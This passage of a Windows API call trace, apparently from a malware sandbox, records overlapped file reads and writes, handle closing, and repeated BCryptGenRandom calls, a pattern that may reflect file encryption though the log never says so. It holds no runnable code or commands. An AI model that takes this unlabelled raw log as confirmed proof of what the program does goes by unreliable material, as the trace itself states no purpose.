lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0170.992] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x8120, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0170.992] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0170.993] WriteFile (in: hFile=0x2a4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x64d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0170.993] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0171.498] CloseHandle (hObject=0x170) returned 1 [0171.498] free (_Block=0x3df0008) [0171.498] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0171.812] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0171.812] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0171.812] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0171.812] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0171.813] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0171.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0171.813] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0171.813] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0171.813] free (_Block=0x3e305b8) [0171.813] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0171.813] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0171.814] free (_Block=0x1fa91d0) [0171.814] free (_Block=0x1fa2ed8) [0171.814] free (_Block=0x1fa90b8) [0171.814] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0171.814] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0171.815] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0xc390, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0171.815] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0171.821] WriteFile (in: hFile=0xec, lpBuffer=0x3fb00ec*, nNumberOfBytesToWrite=0x16f40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8) returned 1 [0171.821] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0172.382] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1a7d8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0172.430] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0172.437] CloseHandle (hObject=0x2a4) returned 1 [0172.437] free (_Block=0x3df0008) [0172.437] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0172.452] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x30408, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0172.519] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0172.521] CloseHandle (hObject=0x2a4) returned 1 [0172.521] free (_Block=0x3df0008) [0172.521] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0172.523] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x30408, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0172.599] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0172.601] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x30800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0172.602] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0172.792] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xc5e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0172.792] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0173.411] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x3c76, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0173.427] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0173.440] ReadFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x49d2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0173.454] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0174.914] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x2810, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0174.914] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0174.915] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x238c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0174.916] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.276] CloseHandle (hObject=0xec) returned 1 [0175.276] free (_Block=0x3d70450) [0175.277] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.288] CloseHandle (hObject=0x2a4) returned 1 [0175.288] free (_Block=0x3f70048) [0175.289] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.303] CloseHandle (hObject=0x3cc) returned 1 [0175.303] free (_Block=0x3e70008) [0175.303] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.315] CloseHandle (hObject=0x170) returned 1 [0175.315] free (_Block=0x1ff1e60) [0175.315] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.318] CloseHandle (hObject=0x2a8) returned 1 [0175.318] free (_Block=0x3fb00b8) [0175.318] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.318] WriteFile (in: hFile=0x2a4, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0175.318] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.416] CloseHandle (hObject=0x308) returned 1 [0175.416] free (_Block=0x1ff1e60) [0175.416] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.416] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x880, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0175.416] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.422] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1440, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.457] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb6c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.457] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.457] CloseHandle (hObject=0x3cc) returned 1 [0175.457] free (_Block=0x3df0008) [0175.457] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.460] ReadFile (in: hFile=0x2a4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x59ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0175.461] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.461] CloseHandle (hObject=0x2a4) returned 1 [0175.461] free (_Block=0x3e70008) [0175.461] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.479] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xac8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.479] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.479] CloseHandle (hObject=0x338) returned 1 [0175.480] free (_Block=0x1ff1e60) [0175.480] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.489] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.490] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.490] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0175.490] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.491] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.491] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0175.491] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.491] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.491] free (_Block=0x3e305b8) [0175.491] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.491] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.492] free (_Block=0x1fa91d0) [0175.492] free (_Block=0x1fa2ed8) [0175.492] free (_Block=0x1fa90b8) [0175.492] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.492] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.503] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xfc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.504] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.518] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x5b10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.518] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.528] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2bc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.528] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.538] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1e60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.538] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.559] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.559] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.568] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1730, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.568] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.585] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.585] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.593] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x6260, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.593] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.619] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x9c80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.619] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.640] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xff0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.640] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.666] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1ac0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.666] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.679] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x590, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.679] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0175.692] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1660, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.692] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, 